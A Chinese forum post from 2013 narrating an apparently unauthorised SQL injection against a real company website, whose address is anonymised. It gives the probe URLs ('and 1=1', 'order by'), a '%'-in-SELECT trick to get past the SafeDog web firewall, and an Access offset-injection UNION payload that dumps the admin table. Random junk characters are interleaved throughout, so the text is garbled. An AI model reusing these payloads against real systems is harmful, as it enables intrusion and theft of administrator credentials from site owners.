打开网站,一个企业站。
( }$ a& [+ a9 a- `# b( `- E( P& N* q( b$ d7 c, S
' M( t5 i* {7 U; r" R) |) Y1 X9 I, S顺手加个admin2 I) \$ K6 _, w: N. I1 y
c* l9 h7 T+ Z- U, f; ?4 S
( n( C) N( j4 M+ @默认后台。( Z# H' l% J& e+ i- L2 h* i0 _
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。$ m% \) _7 ]( E
: m% o/ z" V! R) f! g
, p- J. U3 i7 q. p
2 K& j) e# K7 n% D" y: n0 g所以就不用御剑扫了,待会直接封IP。$ k ]( c' U" H8 W* k. F7 \
, w/ V- [# f! _0 J& {: g/ [用order by语句判断是否存在注入。
0 l3 l6 h9 a5 K* H" Dhttp://www.xxx.com /product_show.asp?id=997 order by 12 p$ ]( q! D& e) n: @2 _
http://www.xxx.com /product_show.asp?id=997 order by 100
& [7 E( s8 \: a7 G/ M! `5 b现在存在注入,经测试后发现是9个字段。
6 }& J0 Q' }# U+ |1 f9 T4 l2 g* S+ L! T
# o$ a8 B4 ?$ b, H0 ^# {接下来进行联合查询,猜是否存在admin表。; g8 l. K7 }- Q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
- Z& ]8 z5 t" e& P) h9 W0 \) f; k: H% f, G( i$ h
+ o0 r" t; t3 | e: ^
1 A/ ^, A' D [6 O- ?
在select中间加个%,se%lect绕过安全狗。( B) {7 l4 C2 }* L0 ~; B; `
4 z2 v* c) |8 N# t8 i' e
/ {9 l' S) \! v. u3 q发现存在admin表,然后开始手工猜常用的字段。
9 S# x; O' u; W' S @纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
2 I3 h8 R% `5 g7 w $ A3 p- e1 G2 U U4 W
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。: m9 ^( D9 R! u
1 t% X( `- d' O. W. b6 e& G
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
# R' B" f) {* u5 Fhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
( q# f2 w5 e4 x( H* a' c) r好了,敏感内容出显了。1 r9 `3 a2 r2 ]. j- Z& ^ p
8 A" M/ {9 B% ^# ?2 F2 \
; h* Y) X% p/ d+ I$ C6 V: G2 V0 s" E% N9 W: S; a
|
发表于 2013-3-8 21:49:45
收藏
支持
反对